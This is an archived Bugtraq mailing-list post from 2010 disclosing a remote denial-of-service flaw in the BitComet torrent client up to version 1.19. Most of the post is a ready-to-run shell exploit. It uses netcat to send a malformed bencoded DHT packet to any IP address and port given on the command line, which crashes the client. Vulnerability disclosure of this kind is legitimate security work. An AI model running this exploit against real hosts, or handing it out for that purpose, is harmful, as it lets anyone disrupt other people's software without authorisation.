bugtraq - BitComet <= 1.19 Remote DOS Exploit

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives

Hash Suite: Windows password security audit tool. GUI, reports in PDF.

[<prev] [next>] [day] [month] [year] [list]

Message-ID: <4BB33C45.6090402@indahax.com>
Date: Wed, 31 Mar 2010 14:12:53 +0200
From: Pierre Noguès <pierre@...ahax.com>
To: bugtraq@...urityfocus.com, secalert@...urityreason.com,
	vuln@...unia.com, submissions@...ketstormsecurity.org,
	submit@...sec.com
Subject: BitComet <= 1.19 Remote DOS Exploit

#!/bin/sh
#
# BitComet <= 1.19 Remote DOS Exploit
# Pierre Nogues - http://www.indahax.com/
#
# Description:
#     BitComet is a torrent client
#
#     BitComet doesn't handle malicious DHT packet with an invalid bencoded message.
#
# Affected versions :
#     BitComet <= 1.19
#
# Plateforms :
#     Windows
#
# Usage :
#     ./exploit.sh ip port

if [ $# -ne 2 ]; then
     echo "./exploit.sh ip port"
     exit 1
fi

nc -u $1 $2 << .
d4294967285:y1:q1:t4:\x001:q4:ping1:ad2:id20:01234567890123456789ee
.